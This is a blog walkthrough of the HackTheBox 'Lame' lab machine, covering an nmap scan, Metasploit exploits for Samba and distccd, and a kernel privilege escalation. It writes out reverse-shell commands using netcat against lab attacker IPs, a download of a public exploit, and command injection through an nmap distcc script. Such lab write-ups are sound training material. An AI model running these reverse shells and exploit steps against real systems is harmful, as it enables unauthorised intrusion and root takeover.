Post

HackTheBox - Lame write-up

This is an Easy box from HTB Labs. Lame is running multiple vulnerable services through which you can get access to the system. Lets start cracking!!!

Nmap Scanning Results
1
sudo map -sV -A 10.10.10.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
PORT  | Status | SERVICE | VERSION
------|--------|---------|--------
21/tcp|open    | ftp     |vsftpd 2.3.4
ftp-anon: Anonymous FTP login allowed (FTP code 230) <br />
22/tcp&nbsp;&nbsp;&nbsp;&nbsp;   open  ssh &nbsp;&nbsp;&nbsp;&nbsp;         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) <br />
ssh-hostkey:  <br />
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)<br />
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)<br />
139/tcp &nbsp;&nbsp;&nbsp;&nbsp;  open  netbios-ssn &nbsp;&nbsp;&nbsp;&nbsp;Samba smbd 3.X - 4.X (workgroup: WORKGROUP)<br />
445/tcp &nbsp;&nbsp;&nbsp;&nbsp;  open  netbios-ssn &nbsp;&nbsp;&nbsp;&nbsp;Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)<br />
3632/tcp &nbsp;&nbsp;&nbsp;&nbsp; open  distccd &nbsp;&nbsp;&nbsp;&nbsp;distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))<br />

Host script results:<br />
| smb-os-discovery: <br />
|   OS: Unix (Samba 3.0.20-Debian)<br />
|   NetBIOS computer name: <br />
|_   Workgroup: WORKGROUP\x00<br /></p>
Exploit Searching

So theres is distccd 4.2.4, samba 3.0.20 service are running on the remote machine. After a quick search on Metasploit and Google found that both the services were vulnerble with public exploit available.

URL: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

Exploitation (with Metasploit)

Samba

Metasploit Samba Command Execuation module is the first exploit I chose to go with. I know there is auxillary script to confirm this vulnerability but who wants to run that on test machine. One must try those to check the results of those scripts. Start Metasploit and run the exploit.

Yaay!! We got the access as root user!!

distccd

I was curious about this service from the start and wanted to dig more. distccd module is also available in metasploit so lets exploit.

It worked but we got a limited shell meaning we are in as a daemon service not as root user/ standard user. Lets find a way to Privilege Escalate it.

Privilege Escalation

1
uname -a

to find out the linux kernel and os version running on the machine. Remote server kernel running foudn to be vulnerable - linux 2.6.24-16-server

Now Download the Exploit to the local machine :

1
wget http://www.exploit-db.com/download/8572 

Move to “/var/www/html” and change permission. Open Apache web server on your local atacking machine

1
service apache2 start

Download exploit in remote machine /tmp folder and compile 8572.c

1
gcc 8572.c -o exploit 

Now we need Create file “run” in tmp file as the exploit executes “run” file.

1
2
echo '#!/bin/bash' > run
echo '/bin/netcat -e /bin/bash 10.10.10.15 1234' >> run 

Execute below to find pid of udevd

1
cat /proc/net/netlink 

Start listener on local machine
And execute exploit with pid of udevd.
Got r00t!!!!

Exploitation (Without Metasploit)

Distccd

Distcc service can also be exploited without the use of metasploit by using nmap script.

To test first we run

1
nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='id'"

We got the uid and gid info back meaning this script is working. now we can go ahead and get root shell.

1
nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='nc -e /bin/sh 10.10.15.102  1234'"

Now grab the flags.This was an easy and privilege escalation part was the interesting bit here.

This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.